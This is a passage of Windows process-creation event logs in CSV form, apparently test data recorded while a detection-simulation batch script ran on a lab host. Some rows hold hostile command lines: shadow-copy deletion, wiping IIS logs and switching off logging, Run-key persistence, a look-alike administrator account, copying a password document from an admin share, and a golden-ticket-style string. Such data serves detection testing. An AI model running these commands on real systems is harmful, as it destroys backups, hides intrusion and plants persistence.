+28,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:48:25.743,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc10,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:48:25.743
+29,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:48:26.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x6ec,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:48:26.017
+30,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:39:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1388,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:39:26.000
+31,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:40:24.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc08,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:40:24.013
+32,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:40:24.027,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x364,C:\Windows\System32\conhost.exe,%%1936,0xc08,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:40:24.027
+33,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:40:25.393,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1338,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:40:25.393
+34,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:40:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x12fc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:40:26.000
+35,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:37:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1128,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:37:26.007
+36,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:38:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13fc,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:38:24.000
+37,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:38:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x123c,C:\Windows\System32\conhost.exe,%%1936,0x13fc,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:38:24.020
+38,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:38:25.453,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13e8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:38:25.453
+39,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:38:26.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x6bc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:38:26.017
+40,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:17:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1254,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:17:26.000
+41,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:18:24.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11b0,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:18:24.003
+42,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:18:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1d0,C:\Windows\System32\conhost.exe,%%1936,0x11b0,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:18:24.020
+43,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:18:25.490,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1070,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:18:25.490
+44,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:18:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x6ec,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:18:26.010
+45,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:13:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc84,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:13:26.007
+46,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.167,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16fc,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,.\reg  not /domain:everything that /sid:shines is /krbtgt:golden !,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.167
+47,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.277,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1700,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c ""systeminfo && systeminfo""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.277
+48,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.340,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1728,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C 42424.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.340
+49,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.353,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1738,C:\Diagnostics\UserTmp\42424.exe,%%1936,0x1728,42424.exe,C:\Diagnostics\UserTmp\rundll32.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.353
+50,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.400,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x175c,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C c:\users\MSTICAdmin\42424.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.400
+51,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.430,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x176c,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C 1234.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.430
+52,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.447,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17a8,C:\Diagnostics\UserTmp\1234.exe,%%1936,0x176c,1234.exe,C:\Diagnostics\UserTmp\rundll32.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.447
+53,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.500,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17a0,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C c:\users\MSTICAdmin\1234.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.500
+54,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.510,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17cc,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32  /C reg.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.510
+55,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.520,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17e8,C:\Diagnostics\UserTmp\reg.exe,%%1936,0x17cc,reg.exe,C:\Diagnostics\UserTmp\rundll32.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.520
+56,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.563,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x143c,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,.\reg.exe  add \hkcu\software\microsoft\some\key\Run /v abadvalue,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.563
+57,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.613,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1064,C:\Diagnostics\UserTmp\tsetup.1.exe,%%1936,0xbc8,"c:\Diagnostics\UserTmp\tsetup.1.exe  C:\Users\MSTICAdmin\AppData\Local\Temp\2\is-01DD7.tmp\tsetup.1.0.14.tmp"" /SL5=""$250276,19992586,423424,C:\Users\MSTICAdmin\Downloads\tsetup.1.0.14.exe",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.613
+58,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.663,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1434,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,".\rundll32.exe  /C mshtml,RunHTMLApplication javascript:alert(tada!)",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.663
+59,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.677,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xbb4,C:\Diagnostics\UserTmp\netsh.exe,%%1936,0xbc8,".\netsh.exe  ""in (*.exe) do start # artificial commandline solely for purposes of triggering test""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.677
+60,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.720,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1404,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,".\cmd  /c ""cd /d ""C:\inetpub\wwwroot""&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&echo [E]""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.720
+61,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.767,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x148c,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,".\cmd  /c ""cd /d ""C:\inetpub\wwwroot""&powershell Enable-WSManCredSSP =2013Role Server -force&echo [S]&cd&echo [E]""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.767
+62,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.807,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1464,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,".\cmd  /c ""cd /d ""C:\inetpub\wwwroot""&powershell winrm set winrm/config/service/Auth @{Kerberos=003D""true""}&echo [S]&cd&echo [E]""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.807
+63,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.850,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14b8,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,".\cmd  /c ""cd /d ""C:\ProgramData""&copy \\[REDACTED]\c$\users\[REDACTED]\Documents\""Password Change Dates.docx""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.850
+64,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.893,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14ec,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,".\cmd  /c ""cd /d ""C:\inetpub\wwwroot""&c:\windows\system32\inetsrv\appcmd set config ""Default Web Site/"" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.893
+65,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.967,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14f0,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,".\cmd  /c ""cd /d ""C:\inetpub\wwwroot""&del C:\inetpub\logs\logFiles\W3SVC1\*.log /q&echo [S]&cd&echo [E]""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.967
+66,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.020,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14e8,C:\Diagnostics\UserTmp\perfc.dat,%%1936,0xbc8,c:\Diagnostics\UserTmp\perfc.dat ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.020
+67,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.077,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1564,C:\Diagnostics\UserTmp\sdopfjiowtbkjfnbeioruj.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\sdopfjiowtbkjfnbeioruj.exe ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.077
+68,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.127,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x155c,C:\Diagnostics\UserTmp\doubleextension.pdf.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\doubleextension.pdf.exe ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.127
+69,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.137,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1550,C:\Windows\System32\vssadmin.exe,%%1936,0xbc8,vssadmin  delete shadows /all /quiet,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.137
+70,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:14:24.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x690,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:14:24.003
+71,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:14:24.023,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x123c,C:\Windows\System32\conhost.exe,%%1936,0x690,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:14:24.023
+72,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:14:25.517,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x244,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:14:25.517
+73,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:14:26.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xa10,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:14:26.013
+74,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:03.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc54,C:\Windows\System32\dllhost.exe,%%1936,0x280,C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E},C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.017
+75,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:03.047,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbc8,C:\Windows\System32\cmd.exe,%%1936,0x440,cmd.exe /c c:\Diagnostics\WindowsSimulateDetections.bat c:\Diagnostics\UserTmp,C:\Windows\System32\svchost.exe,0xfaac27,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.047
+76,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.057,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x10cc,C:\Windows\System32\conhost.exe,%%1936,0xbc8,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.057
+77,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.247,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1288,C:\Windows\System32\cmd.exe,%%1936,0xbc8,cmd  /c echo Any questions about the commands executed here then please contact one of,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.247
+78,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.257,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x3dc,C:\Windows\System32\cmd.exe,%%1936,0xbc8,cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft.com; dotanp@microsoft.com; liengli@microsoft.com,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.257
+79,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.390,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x2a8,C:\Windows\System32\net.exe,%%1936,0xbc8,net  user adm1nistrator Bob_testing /add,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.390
